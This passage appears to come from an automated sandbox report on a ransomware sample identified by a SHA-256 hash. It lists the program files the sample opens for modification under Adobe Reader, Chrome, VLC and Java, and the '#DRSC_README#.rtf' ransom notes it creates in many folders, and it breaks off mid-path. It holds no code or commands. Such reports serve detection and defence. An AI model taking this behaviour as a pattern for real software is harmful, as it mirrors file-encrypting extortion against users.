710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrmstp.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\CompleteCheckmark.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\javafx.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\README.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_closereview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\access-bridge-64.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_24.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javaw.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_sv_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\klist.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\framework-dev.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_cs_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\generic-rhp-app-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fontconfig.bfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-down_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\help.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder_dark_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\SearchRegister.rar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\faf_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\tools.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-default_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\servertool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_es.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\organize.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ru_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 